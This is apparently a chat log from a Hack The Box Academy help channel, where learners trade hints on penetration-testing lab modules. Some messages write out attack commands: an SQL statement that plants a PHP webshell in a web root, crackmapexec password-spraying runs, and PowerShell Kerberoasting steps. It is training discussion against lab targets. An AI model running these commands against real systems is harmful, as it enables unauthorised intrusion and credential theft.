can someone help me

what happens when u type the address in?

Can someone assist with: WEB SERVICE & API ATTACKS - Question: Identify the username of the user that has a position of 736373 through SQLi. | I have located the vulnerable parameter and SQLi using SQLmap, but I don't understand how to get the info for the position with this knowledge.

Anyone available for a nudge on metasploit module?

Hello
Please am new to crypto
I wanna invest but don't know how and where
I think I need assistance
am I in the right place to find a good crypto trader??

No

hi anyone knows how to encode the decoded cookie?

depends if you know how it was encoded

you can reverse it and decode it

i tried all the ways

decode the HTBPERSISTENT cookie by URL decode and then MAGIC from cyberchef

how do you recode back?

and send to request?

section Documentation & Reporting Skills Assessment, I have creds of user ||dhawkins||, ping sweep i have 4 hosts. Using crackmapexe for checking but get nothing, can anyone help me out? thanks

Try —local-auth

have u done that section?

it's more simpler than you think

don't unnecessarily over complicate things, use what you have and build on top of it

yeah

can i DM you? i just ask something about hint

sure np

I just hit this same problem, This post was very helpful with finding a solution #modules message

Thanks so much for helping me, and pointing me out. GG

you're welcome

attack common services easy lab i dont get how to execute webshell

hellou

im trying to install hcxtools but doesnt work

i use : git clone https://github.com/ZerBea/hcxtools.git, cd hcxtools, make && make install

and i have this error `

somebody can help?

anyone knows how after decoding and modifying?

Yes, if you still need help

Need a nudge on SQLMap - Bypassing Web App Protections - Case #10

[CRITICAL] an error occurred while evaluating provided code ('TypeError: Strings must be encoded before hashing')

Tried a couple of other things and its not quite clear if this is the path forward, missing some understanding and would like a nudge if possible

did you manage to solve? I am stuck also exactly where you are

show me your command

the command that you have typed into your shell

Anybody that did the module server attacks?

try adding single quotes around the password

or remove it and type it in once you are asked

yeah, I am currently on the v**** machine, in the end I ended up using|| chisel|| (1.7.4) and I was able to connect through proxychain with rdp, no idea because previously it would not let me connect

yep, For that module I ended up downloading the chisel 1.7.4 binary

Any understanding on why this does not run or work I'm so confused

ip is still alive?

yup just reset it

hmm

and redid all the steps to recreate new file etc

Try sudo

guys I need help for skills assesment port forwarding
I stuck here: Use the information you gathered to pivot to the discovered host. Submit the contents of C:\Flag.txt as the answer.
I have no clue what to do next
feels like stuck for eternity

I found creds have access to w*** the pivot is 172.*

What commands are you running?

I am about to try it with chisel I guess that one will work, cuz in of the sections I have done it using chisel

yes, it did work, thank you

hey, actually stuck in Navigator (linux fundamentals), with the question about inode number of sudoers. tried cd /etc, ls -i sudoers it gave me 964110 but that's wrong. Any help? This is not the first time the question was asked, but there's no answer

make sure you have connected to the target

I am

i restarted the vpn + the box, still '964110'

I haven't done the module, but your prompt looks like the pwnbox prompt. Are you supposed to connect to a box first?

you are not connected

to the target

target != pwnbox

but it is saying "Connected to htb-sirnzpckwl.htb-cloud.com:1 (htb-ac710058)"??

i'm supposed to connect to a target

i'll try by ssh

Hello, I'm stuck in Skils assessments on pivoting, tunneling and port forwarding, I found the credentials of v--- as well as the ip address 172.16.6.*, the point is that when I connect remotely from m---, I have the same folders as m--- as well as the network settings, any idea how to proceed?

how did you get to v*** password?

||mimikatz||

fvck no, I was trying it now

thanks

I thought I have to transfer the file .dat and it appears that it "does not" exist when I try dir in cmd

Hi,
I'm stuck on Attacking Common Services - Easy
I am connected to the database. I try to launch a reverse shell but it does not work.

I don't understand, especially if I write a test file and I want to open it on my browser I can't find it.
If I make a request to read the file from the DB it finds the file.

I write it in C:\xampp\htdocs\ which is normally the right place.

Still having the same problems with SQLMap

Any help would be appreciated

I get another inode, and it works with the ssh one

you can dm me

Ok, thanks

was able to figure it out!

mhm

can you verify that file actually exists?

Password Attacks - Hard Lab : hi guys, does anyone know how to move the || logins.kdbx || to attacker machine? tried via ||smbserver|| but windows blocks the connection

I can not seem to connect to this IP

I can not connect with SSH

I used impacket-smbserver but they're are plenty of ways to transfer it

what command are you executing? It also looks like you're not using Pwnbox so make sure your VPN is properly connected.

ssh user1@165.227.228.154

you're not specifying the port. By default SSH uses 22. You need to add -p 31459

ohh thank you why did I not think of this

make sure you read everything carefully and slowly😉 In the question it tells you how to use the command

oh sorry! had a typo on my question, yes i used what u used but it refuses to send

Yee, I ping the IP and it was not responding so I thought there might be e problem

can you send the command you're executing?

wow. the medium lab for the attacking common services is WAY easier than the "easy" lab. lol geez

|| sudo python3 smbserver.py -smb2support AttackerPC /home/htb-blablabla/Desktop/ ||

Yes file exists

File exists / its there / cant tab complete to it etc

try ||impacket-smbserver ||

could you verify with a ls and pwd ?

||You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.||

this is from my windows cmd

okay yes

I keep getting stuck on pretty much every module at least a few times because the target IP stops responding. I've taken up a habit of just resetting the target a few times whenever I feel like I'm not progressing (and usually that was the problem). It's getting a bit irritated to not know whether I'm doing something wrong or if the target is down. Is there a fix for this?

tried looking around if there was something to turn off but can't do much without admin rights

so the problem isn't Windows blocking it (well technically). If you remember from the File Transfers module, Windows will block unauthenticated requests. If you setup a username and password (which I'd recommend doing all the time) it should work.

😮

thanks, will try it rn

if you haven't done the File Transfer module, I'd highly recommend it

i did that

but forgot this part hahah damn too much stuff

good notes are important!

not only will it help you with the CPTS exam (which I'm assuming you're on), but once you're done you basically have a cheatsheet/playbook for future assessments

i always make sure to download the cheatsheets and add some notes to them, but yeah i missed this ahah

ty

imo I'd build you own notes and use the cheatsheets as a secondary resource

yeah thats something i wanna do, just gotta find the time to make it all from scratch

if I were you I'd start now. Especially before you get to some of the "heavy" modules

I used this command still not working ssh user1@165.227.228.154 -p 32520

nevermind now it is working

so odd

Cool I'm glad to hear that , i'm stuck with the reverse shell at the easy.
i hope finish this module today but it's late 18h in France

how did you upload it? and did you try a webshell?

yeah tomorrow imma spend the day on that 🙂 , im around 70% done before getting the exam voucher

(btw yeah, file transfer worked, ty again)

Sorry just got back yes veryifying now

Hey, i am trying "Nibbles - Initial Foothold". Everytime i try to upload a file with the plugin My Image it ends with this The connection was reset

The connection to the server was reset while the page was loading.

The site could be temporarily unavailable or too busy. Try again in a few moments.
If you are unable to load any pages, check your computer’s network connection.
If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web.. The VPN is still running.

I try to upload a reverse shell from the database connection
i can create the file and read it from the DB but when i try to read from my browser nothing happens.

Anybody tried Credential Hunting in Linux lately, my box crashes after like 2 minutes of hydra which is mighty annoying

i had to use a php webshell. its listed in the example sheets how to put it there. and did you verify which folder your writing it to? thats important

i see on the FTP is in the basic folder : C:\xampp\htdocs\

weird... I haven't done the SQLMap module yet, but I just tested the command and it works for me. Valid HTTP request in the file (which would be a different error, but worth a try)?

yea I can copy as curl and send

and it works

but I cannot save to file then call it its so weird

try copy and pasting it to a different file and try that

ok good. try writing the webshell there and using that instead of a reverse shell. for some reason they dont want to start

Yea just did

mhmmm I'm not sure then

Yea its been stumping me, + question has stumped me for like 4 hours now

lol

hurting my brain

Need to get this figured out before I take the test 😦

I need help in Web Proxies module > Skill assessment > Intercepting Response question
I'm doing what exactly need to do but didn’t get the flag !! Changed disabled to enable and forward the request from Burp > turn interception off in burp and click get the flag button
This is the page source after modifying HTML code

It does says enable but not showing me flag
what am I missing ?

#cwes message

I'm sorry I'm sharing in multiple channel but I see more people are active here

try doing it from PwnBox or if you're in a PwnBox a VM.

Yea ill switch to pwn box , prob works perfect there lol

you could also try updating the system (tool) first to see if that works

I use this command :
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\\xampp\\htdocs\\webshell.php';
And this for access to the webshell
https://10.129.203.7/webshell.php?c=whoami
But the same ...

Yea I full updated , its an arch repo

I thought maybe i fucked up something and went clean install as wsell

Ill get it figured out eventually or keep crying lol

that looks about right....maybe http?

i cant remember if i did http or https

Did you try using the full path instead?

@proud pine yes i've done fujll path as well

lol way to put a damper on my hopes that the hard lab would be the easiest one because they got them backwards

Oh yes thanks is good !
I tried http but I was redirected to https every time but this one works
I just have to find where the flag is !
Thanks a lot!

Nope, lol. The easiest so far was the med_lab (crazy), but the hard_lab is god awful. Possible worse than the "easy lab".

np. should be easy after you use 'whoami'

Show the error with the full path?

aww crap. ok. better mentally prepare myself

The annoying thing is, i can feel i am close, as in the last one of two steps, but i've hit a wall, hard, and nothing is working.

well im not gonna look at your spoilers just yet. im gonna start the enumeration stuff pretty soon though

1 sec

Full path worked this time...waht ....I dont care

it worked LOL ty

So I'm lost on Attacking Common Services - Easy. I've got the full username and after exhausting other paths it seems I need to brute-force the password which goes against what you should do in real life but it's what everyone is saying to do. However, I keep getting locked out from multiple services due to too many password attempts. I'm using the provided password file as well. I could wait for the lockout to end and pick up on the next set of passwords but that seems silly. Any thoughts?

if your using hydra slow down the threads

also try other popular wordlists as well

cool will give that a try

Lol the medium is a joke ^^
let's go to the hard ! 😉

im starting to think that the medium they wanted us to go in a different direction with the pop3 but i mean....if its an exploit its an exploit

Good evening! Who can give a hint?
Active Directory BloodHound:BloodHound for BlueTeams:Which relationship (edge) do we need to remove to break the path between David and Domain Admins?

So it's working down the list much further since reducing the threads. I guess the service isn't getting locked out from too many login attempts but from how many attempts occurred simultaneously?

looks at the GUI, what's between David and Domain Admin?

yea. closes the connection because there are too many incoming connections

Thanks. Totally assumed the wrong reason

np

I need some help with SQL map essentials OS exploitation, once I get to the os-shell I can't go anywhere, I've uploaded shell.php to the target but don't "hear" anything on netcat... any help into the right direction of finding the 2nd flag would be greatly appreciated.

Hey, i'm stuck here I don't know what else to do with that code the terminal gave me, or maybe im taking the wrong path.

You found the flag for a different question

need to deobfuscate the js in api.min.js

now i'm here trying to do some code analysis but i don't have info about these functions or what they do, can i get a hint?

personally Id replace the eval with a js print and then run it in a sandbox

nothing

imma try to look for more ways to get this

sounds like you should read through the section materials again

yeah maybe is just because im having a bit of a headache now

thanks madf0x

Can someone tell me were im wrong?
https://gyazo.com/add5a3f0efa23854c5e8271867fb01d4
https://gyazo.com/e191ed86c07d1037689203f21607acb0

Ok. Cant read SRY

I did the same thing don't worry

careful with spoilers pls

Can someone please help me with the CrackMapExec Module : Skill Assesment
I cannot get a single hit for the correct password during spraying

Is there anybody that can help with the hard lab attacking common services?

https://dontasktoask.com

I did. But when i do, my msg gets deleted, even with all the spoiler tags.

Can someone please help me with the CrackMapExec Module : Skill Assesment
I cannot get a single hit for the correct password during spraying

As I have been having so much trouble trying to get a password hit i basically bruteforced the answer to the question first; "What's the password of the account you found? " I've used the correct answer I have for the question to password spray against all accounts I found using --rid-bruteenumeration action.

Ive password sprayed against all hosts within the network without success:
Using these commands:

proxychains4 -q crackmapexec winrm 172.16.15.3 -u users.txt -p Password1
proxychains4 -q crackmapexec ldap dc01.inlanefreight.local -u users.txt -p Password1 // hosts updated
proxychains4 -q crackmapexec smb 172.16.15.3 -u users.txt -p Password1

proxychains4 -q crackmapexec mssql 172.16.15.15 -u users.txt -p Password1 --local-auth
proxychains4 -q crackmapexec mssql 172.16.15.15 -u users.txt -p Password1 -d .
proxychains4 -q crackmapexec mssql 172.16.15.15 -u users.txt -p Password1
proxychains4 -q crackmapexec smb 172.16.15.15 -u users.txt -p Password1
proxychains4 -q crackmapexec winrm 172.16.15.15 -u users.txt -p Password1
proxychains4 -q crackmapexec winrm 172.16.15.15 -u users.txt -p Password1 --local-auth

proxychains4 -q crackmapexec winrm 172.16.15.20 -u users.txt -p Password1 --local-auth
proxychains4 -q crackmapexec winrm 172.16.15.20 -u users.txt -p Password1
proxychains4 -q crackmapexec smb 172.16.15.20 -u users.txt -p Password1
proxychains4 -q crackmapexec smb 172.16.15.20 -u users.txt -p Password1 --local-auth

How did you get the token?

Can anyone help me on AD Enumeration & Attacks - Skills Assessment Part II Q4. - Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

I created a username list with two letters and numbers and combined that with valid users on jsmith. I created a small password dictionary file. Sprayed many times but no luck.

try one of the ones they use for examples

thanks

Hi all,
I'm in the AD Enumeration & Attacks - Skills Assessment Part I, Question 2 Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433.
I'm trying to follow section Kerberoasting - from Windows, targeting a single user.
||First adding the System.IdentityModel.

PS> Add-Type -AssemblyName System.IdentityModel

Then perform the Kerberroasting attack:

PS> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"
New-Object : Cannot find type [System.IdentityModel.Tokens.KerberosRequestorSecurityToken]: verify that the assembly 
containing this type is loaded.
At line:1 char:1
+ New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidType: (:) [New-Object], PSArgumentException
    + FullyQualifiedErrorId : TypeNotFound,Microsoft.PowerShell.Commands.NewObjectCommand

Problem is I get the error Cannot find type [System.IdentityModel.Tokens.KerberosRequestorSecurityToken]. But shouldn't that have been added by the Add-Type -AssemblyName System.IdentityModel command?

Any suggestions on how to proceed?||

I think i used
||Get-DomainUser * -SPN | get-domainspn something||

I already got the SPN, it's given in the question text.

ahh i missed your question.

Can someone give me a nudge on web attacks skills assessment.Ive got the UID, PHPSESSID, and the token.

Have you tried a way of logging in as the admin?

can i dm?

sure

I'm stuck there too. Can you give another hint maybe? if you remember the task 🙂

is there a trick to reading a file in a smb share that is "read only"

ive tried !cat file.txt

it says file not found

So im in the Attacking Web Applications with ffuf - Filtering Results. I have added the academy.htb to /etc/hosts/ but when I try to actually access the website nothing. When I run the ffuf -w /SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htp:30771/ -H 'Host: FUZZ.academy.htb' -fs 900 to even see if admin is a subdomain I get back nothing. Is there something i'm doing wrong?

https://academy.hackthebox.com/module/19/section/119#questionsDiv

can someone help me with question 119 ?

Not 100% sure since my note is not great, but I think i used powerview get-domainuser something. The easiest way to find the command is checking the cheatsheet from the academy.

Okay 🙂

time for the AD Skill Assessment 😅

Glad I have other voyagers on this. Would have been lonely.

good luck!

its the midboss of CPTS for good reason. Easily my fav skill assessment in the course

Anyone else have this issue when trying to start Nessus?

looks like you dont have the service file on that machine

I'll reset it see if the next machine has it

same issue.... -

Something is broken

nm, I guess you don't need to start the service it was already started

looks like its lookong for nessus.service but yours is nessusd.service

oh Duh - still didn't allow me to run start|status|stop commands lol but http://IP:8834 works anyways

Please I have a question from the Password Attacks module -

Forging tickets through overpass the hash or pass the key is relevant only when a user's ticket has expired yes? Because I cant really understand why else there would be a need to request a ticket with rubeus using the rc4 hash when you could dump tickets. clearifications would be helpful thank you!

Also Please, Is it possible to use Rubeus entirely for a Pass the ticket attack? I understand the only way to present a ticket to Rubeus is through Rubeus.exe ptt /ticket:B64_TICKET but the ticket here in question requires you converting a mimikatz exported ticket kirbi file into base64 and using here OR Using Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /rc4:$RC4_HMAC /ptt but then the only way showed in the module to get the RC4_HMAC hash is thru mimikatz. The exercise asks to try practicing with both mimikatz alone and rubeus alone thats why I have these questions, thank you anybody

EDIT : I understand now loool

Hello all. I was going through Active Directory LDAP module and i don't know why it doesn't work the answer i am providing to the question **"What is the domain functional level?" ** I am using the tool that basically gives me the response, but then when i am pasting it, it says it is wrong. Can anyone provide some help?

@faint rampart Noob take here. If you can crack the users hash and retrieve a cleartext password, I believe Rubeus can generate RC4 + AES keys.

In regards to you previous question, I believe you're using the users hash to acquire a terminal session with that users TGT? It's been a while since I did that module or played around with mimi/rubeus.

okay okay
Thank you so much, I will search for the command for that, this module is fun but really confusing me only in the PtT aspects anyways maybe im overthinking

Yes for forging a ticket, overpass the hash aims at converting the RC4 keys into a ticket with Rubeus so you can pass the ticket and gain a session as the target user or do other stuff But my question here is, Is there a need to forge tickets(aside from TGT expiring) when you can dump tickets with both mimikatz and Rubeus

Good quetion. I'd say it's because perhaps the user you are looking for doesn't have any tickets stored in memory on that host.

So you use rubeus to interact with the KDC, supplying a properly encrypted password in order to get a ticket.

Again, I'm super new to this stuff, so don't take my responses as absolute lol

But yea, your reasoning makes sense too. I'm not sure how to restore an expired ticket; gotta get a new one.

okay this makes sense, thank you very much!

yeah tickets have a TTL of 8/10hours for validity after which a new one has to be requested...

Thank you very much!

@faint rampart sure thing bud

if you still need help with nibbles let me know

not the server for this, get lost

hello

where can i ask a noobish question about gaming hacking?

Thanks for the heads up. My issue was I did not create a comprehensive username dictionary. I simply created a file by changing the numbers without touching the letters. ha!!
This was very interesting because the windows tool does the work for you, which was a great lesson for me.

interesting, thats not the part of it I thought you were doing wrong lol but hey if it works it works

guys no one answers me?

not the server for this

or rather at least not the channel

#rules and #welcome

in fact i was asking where could i found someone to ask

#rules and #welcome

this channel is for module discussion and module discussion only

bro i can't write in that channels

...

i ve written on this for a reason lol

youre dense

i'm a newbiewìe

just read the rules and welcome

lol

if you cant read simple discord channel instructions youre not gunna fair well in your pursuits

goread #rules and #welcome

its not supposed to be this difficult

youll get your answers if you do

how do I run an exploit that I found using searchsploit? I copied the exploit to my machine, but when I try to use it by typing the file name, it says command not found

depends on the exploit

often you have to make sure its executable and make sure youre specifying the path, but you absolutely need to read the instructions for it first. Many exploits wont work or worse unless you do what they say which may involve minor modifications

sometimes the exploit is just a text file that tells you how to manually do it

how do i find the instructions for it? I typed 47887.py --help, but it said command not found

you read it

the exploit is python code

there's no instructions inside of it

read it first, then chmod +x ./47887.py to mark it as executable and then can run it with ./47887.py

I did that, but it still says command not found

did you include the path

./ if youre in the current working directory

same command not found when i did ./

thats more specific here, its having an issue with a line in the code itself

youll need to run the appropriate python interpreter for it

likely python3 or python2.7

so just throwing it out there. they should attempt to explain the syntax a little more for the common services hard lab on abusing the mssql

adding python to the beginning worked! thanks @thorn urchin

even with research that was a brain exploder

Hello, I'm stuck in the skills assessments module (pivoting, tunneling and port forwarding) I currently have the v and m credentials, I have did portforwarded between both machines to access the workstation, but I couldn't due to I have access or timeout problems. Any help please? (I'm stuck on question number 5 btw). Can anyone help me with this please?

How did you get access because I am dumb as well 😄

my bad

sorry

Explore with root

hello

You are using the 'auxiliary/scanner/http/coldfusion_locale_traversal' tool within Metasploit, but it is not working properly for you. You decide to capture the request sent by Metasploit so you can manually verify it and repeat it. Once you capture the request, what is the 'XXXXX' directory being called in '/XXXXX/administrator/..'?

i have done in msfconsole

how to find XXXXX and what to do next?

If only there's a way to print the working directory

I have a question about the Pass the Hash section in Password Attacks. It shows how julio can access the \dc01\julio directory, but it says nothing about how to access the files within it. I can't find that information anywhere in the lesson. It's like it just skips over that. Does anyone know how that is accomplished?

can someone give a hint on where to find the ldapadmin password for the windows privesc skills assessment task part 1?

I figured it out. It helps if you specify the whole path when you use the "more" command.

umm...the "more" command? I dont remember something like that. hmmm. I already tried running searches for ldapadmin mentioned in files from the c:\ directory and not much success from that, can you give another hint?

Sorry, that wasn't meant as a response to your question. I was saying that I answered my own previous question.

ah oh, been stuck on this for a long time, thought that finally someone answered 😆

Hi all,
I'm in the AD Enumeration & Attacks - Skills Assessment Part I, Question 2 Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433.
I'm trying to follow section Kerberoasting - from Windows, targeting a single user.
||First adding the System.IdentityModel.

PS> Add-Type -AssemblyName System.IdentityModel

Then perform the Kerberroasting attack:

PS> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"
New-Object : Cannot find type [System.IdentityModel.Tokens.KerberosRequestorSecurityToken]: verify that the assembly 
containing this type is loaded.
At line:1 char:1
+ New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidType: (:) [New-Object], PSArgumentException
    + FullyQualifiedErrorId : TypeNotFound,Microsoft.PowerShell.Commands.NewObjectCommand

Problem is I get the error Cannot find type [System.IdentityModel.Tokens.KerberosRequestorSecurityToken]. But shouldn't that have been added by the Add-Type -AssemblyName System.IdentityModel command?

Any suggestions on how to proceed?||

i didnt undersand what do you mean , could i dm yiu?

try another Windows tool

I only have a webshell, there are no tools on the machine to begin with and the upload function of the webshell is not working?

if you have a webshell, you can upload/download files right?

Hi guys

hello

How are yall doing?

Can someone help me out with broken authentication skill assessment and here is what I know
I know how the cookie works.
|| I know how to find valid users and something to do with country code. ||

fine 🙂 and you

Good

Where are you guys from?

I have tried || alpha 2 and 3 code
Ex support.AF and support.AFG and replace . With some other char || but no luck.

Whenever i upload i get:

And no file appears in the directory

Hey guys, I'm doing password attacks - easy lab and I'm trying to bruteforce ftp with username.list and password.list. It's taking quite a time and I'm scared I'm doing something wrong, but I don't see any other options

You do everything right
It just takes a long time

Ayy, I am not permitted to send messages #HTB:serious discussions channels, wy tho

Do i need to cross a certain level

You need to verify your account #welcome

danke

Anyone available to help with the CrackMapExec module Skill Assesment?

I've tried everything from the course content now and I've had no success

So …. There are many files or scripts that you can use to have a reverse shell. I used a powershell script by nishang. Also the web application has some sort of WAF or rules (or it may just dont like certain file extensions) that doesnt allow certain format.

||I managed without a reverse shell at all 😄 Rubeus.exe was able to upload for some reason, then I enabled RDP which allowed me to run the ping sweep to find MS01 and then netsh.exe to pivot ||

That is very interesting. I will try that! Thanks for the info!

Hey, yes i still have the same problem

I just finished Introduction to Academy and Learning Process. Does anyone recommend any tier 0 modules to start off?

I am having constant trouble with the academy labs. I can't finish a single attack before the target drops offline and i lose access.

Eh question
If I buy the yearly plan
Do I get cubes too?

The one with the cpts

if you're talking about the Silver Annual, you do not get cubes. only the Silver, Gold, and Platinum monthly subscriptions give cubes through subscriptions

but if you buy the Silver Annual, you will have access to the entire CPTS path and earn cubes from completing the modules within it.

Hello guys, can someone help me about a error i get in the "Soccer" (easy) machine? im following a writeup step for step but im still getting an error i dont know how to debug. please DM me!

Read #welcome please and verify. This is not the channel for boxes.

oh sorry!

Ah sorry, it is silver annual
Ohh was curious cuz there were some tier 3 modules that look interesting that I wanted and it wasn’t in those role path

yup so you'll either need to complete courses and earn those cubes, buy those cubes separately, or buy a Silver, Gold, or Platinum monthly subscription. HTB Seasons also offer cube rewards now as well

Oh wait if I have a silver monthly sub and I buy the silver annual
Do I keep the silver monthly sub?

If that’s the case I can just pay that and slowly do and save up for the tier 3 stuff

I can't answer that as I do not know. I'd assume the answer is no though, one would overwrite the other.

Ah
I will buy and test it out

Thanks man

npnpn I will say if you need cubes always buy the monthly plans over the cubes themselves (unless you want/need a module in the moment).

Tbh i was considering the gold monthly for like 2 months and buy the course
But is like cheaper by only abit

the student plan is always the best if it's available for you. once I finish though I'll probably get the platinum monthly to knock out some Tier III modules

I can’t get student plan

Welp thx for your help
Time to buy it

np good luck on whatever you decide!

&Xd*Gz5d

I am stuck on this module also. I have answered the first question. I have found another user and their shares with creds but those creds can't be passed anywhere. No luck getting access for the second question at all.

Are you on the skill assessment ?

Yes

PM'd

attack common services easy lab how do i execute my payload

I assume that you already sent your file to the server with the extension .php, what happens if you do ||name.php?cmd=whoami|| in the url?

from https it just downloads the file from http nothing 404

where did you upload it to?

if anyone has any knowlde on the brocken authetntication wfuzz module please let me know. all responses show 200 and im unsure how to distinguish

djikstra please mask the username since it is a part of a question

That time it takes you hours to do the "easy" module and 5 min to do the "medium" one 🙃

DM me

Is anyone around that understands Web Attacks - Advanced File Disclosure. I was able to get the flag using CDATA but struggling to get it with Error Based XXE. I want to ensure I understand both methods and not doing something dump.

Can someone help me with question 2 of AD Enumeration & Attacks - Skills Assessment Part I? I've tried a few things but haven't made any progress...

Lol I suffered on this problem as well. Restart worked for me. If you find out why it didn't work at the first time, please let me know.

#prolabs-aptlabs

Anyone working on FIle Upload Typefilter?

Hey need some help on the Page Fuzzing of Attacking Web Applications with Ffuf. I dont know if the server is broken or im doing something wrong

Hello fellows, quick question please ^^ We often face the following situation: Initial windows Host obtained with a reverse shell -> autoroute + socks + proxychains to a 2nd windows host. The question is -> what is your "best" method to upload stuffs (like mimikatz) on the 2nd windows host? I can easily transfer stuff to the first host (dozens of ways), but I struggle to send over to the second host. Oftentimes, there is no python on the first host or ftp server. I can upload nc64.exe on the first host... but no nc on the second 😦 THANKS for your ideas ^^

xfreedrdp 😄

(the transfer module does not precise that that much; often all the tools are available in c:Tools)

with Ctrl+C Ctrl+V 😄

or with meterpreter

upload fuction

yes, but nope, I have one shell in msfconsole and the other one with proxychains xfreerdp

so both msfconsole or CTRLC / V can't help

If it's in c:tools then use it there, if not then there is the wget / invoke-webrequest

yup thats also my second go-to

but to wget, you need a webserver on the first host ; which we don't have 😉

But also using the windows remote access tool, in advanced options you can select it to share the files from the system you're using

you can always check the cheat sheet in the file tranfer module

This has more to do with pivoting in general than file transfer

hey any ideas why I always have to use -Pn with nmap when scanning boxes now? I didn't used to have to do that. I can connect to the boxes and do the exercises just fine.

Yep ^^ did that, but I might have missed something then. My use case is: msfconsole on one hand. xfreerdp with proxychains on the other hands

how to transfer files easily between both

Clure

exactly

It also helps if you tell us what module you're doing

And the section

Rather than just saying you are having an issue

Maybe my question was not at the right place. it's more "a general matter". But to answer you, I'm doing the first skill assessment in the AD-Enumeration-and-Attacks

You can also mount your files to the Windows system with xfreerdp, try looking at the man page to find that option

By telling us this, you help us understand where you're at, if someone else has completed this a different way they can nudge you in a different direction

sure

So I'm at the question Find cleartext credentials for another domain user. Submit the username as your answer. ; trying to upload pillaging tools on the host I have a shell on through proxychains xfreedp; if someone can help ^^ Thx

just copy past

Have you done the module Attacking Web Applications with Ffuf?

For FIle upload Type filters, I can successfully upload the file File successfully uploaded But I'm getting The requested URL was not found on this server. when I try to browse the file after I upload it.

Hi I'm stuck at network enumeration with nmap
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.

Can someone help me with this question please? I'm trying sudo nmap $IP -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53 -sV but I don't get back the version

run a nmap -sV $IP

@dapper temple I don't get back anything useful shouldn't it give a flag or something? Not sure which service they are talking about

maybe its running on a weird port. so you'd need to run that same command for all ports

Anyone for Data Movement in Intro To Assembly Language? I add mov rax, [rsp] at the end of the attached code but I get a segmentation fault.

Hello, currently stuck on the Server-Side Attacks Module, Nginx Reverse Proxy & AJP.

Each time I try to set up the enviroment I got this message:
nginx: [emerg] "location" directive is not allowed here in /etc/nginx/conf/nginx.conf:65
I assume im not setting up the nginx.conf file correctly?

i dont understand how on AD enum and attacks acl primer the answer to "Which ACE entry can be leveraged to perform a targeted Kerberoasting attack?" isnt generic write when in thew same lesson it says. "GenericWrite - gives us the right to write to any non-protected attribute on an object. If we have this access over a user, we could assign them an SPN and perform a Kerberoasting attack (which relies on the target account having a weak password set). Over a group means we could add ourselves or another security principal to a given group. Finally, if we have this access over a computer object, we could perform a resource-based constrained delegation attack which is outside the scope of this module."

I think I have the answer for you but let me verify real quick before I mislead you

ok tyvm cuz its makin me mad. lol

Okay, basically GenericWrite is technically a correct answer, theres just a more correct answer that uses the phrase more specifically

is it one of the aces shown in the module?

yeah, they use the line of the question verbatim

damn i must be really be blind today ty

np

use pwnbox or parrot it will work..

i give up i reread it 3 times the answer isnt GenericWrite WriteSPN or WriteOwner i then proceeded to try every ace on the page lol

Maybe you should get some sleep and try it again later then lol

when I say verbatim I mean verbatim

you can ctrl-f it

i did it didnt show up lmfao

what exactly did you search for

the word targeted only appears twice in the section. Once in the question and once in the answer lol

i tried kerb

well youre not looking for kerb

youre looking for targeted kerberoasting

I struggled as well but bloodhound indicated the answer pretty noticeably.

its very literal

you def dont need bloodhound for this question

not even a lab environment for this Q

Oopps sorry

i didnt capitalize generic all ffs

I thought it was about the lab.

didnt know the g needed to be capital rip

lol

and i assumed it needed to be more specifically about kerberoasting not less

Anyone know where I'm going wrong with this output? (File upload exercises)
||The image “http://1$IP:$PORT/profile_images/text..phar.jpg” cannot be displayed because it contains errors.||

whats your payload

Try .jpg..phar 🙂

Hi, I'm in Password Attacks Lab - Medium, and I got the d** user information and the ssh file. What do I do next?

and how would I ever have known to switch that?

In that module, they show you a script which appends file extensions 🙂

I use that, inside burp Intruder

cause the section content mentions how some applications only process the last extension used

the content is getting more obscure. I mean I knew something was funky with that filename because it was returning that error. I had to loop through running curl trying to find a commonality. It got my brain going in circles either doing nearly the same thing, expecting a different result

I used ffuf and just fuzzed everything in that module

made it 10x easier

anyone that has done Login Brute Forcing that i can DM with some doubts?

this web modules are driving me completly nuts, the machines are very unstable to me. totally slowing me down. Am I the only one? This did not happen at all with the previous ones

Web Attacks Skill Assessment - was a fun one and wasn't as bad as I thought it would be. Almost got stuck and had to ask but pulled through.

yeah lmk if you need help with login brute forcing

You get this?

that moment when you waste 90min trying shit before you realise you just skipped the bit of text that hints at where to get the foothold so that you don't have to do that 🥲

Yeah one of them I had to restart the box 50 times and finally got one that showed the UID.

Module: Attack Common Service / SQL

I can login to BD with the htbdbuser credentials but I can’t do anything inside the DB. Please give me some ideas! Thanks!

Hi, how do I scan 172.16.6.x?

you either need to be on the first host; or use the first host as a proxy-host

@fathom pendant Thanks. Should I be expecting to scan a Workstation and DC from that? because I was not able to scan anything from 172.16.6.x, not sure if there is anything I miss out

Google what a Ping sweep is and how to do it within Powershell or CMD if your first host is Windows, terminal if Linux

hey guys I am a beginner here, having a bit of trouble on the very last section of the Getting Started module. Its called 'knowledge check' and I've been at it for a while now. I've taken detailed notes of the info gained on the target box, and tried to follow the procedures taught throughout the module, and have managed to gain access to the website on port 80 as admin. I think I'm supposed to be able to gain reverse shell access to the webserver with my admin privileges, but I'm having trouble. ): there are 2 plugins installed but I don't think I can reconfigure them. Am I supposed to download a 3rd plugin that would give me reverse shell access? Or am I going down the wrong rabbit hole..? I'm lost!

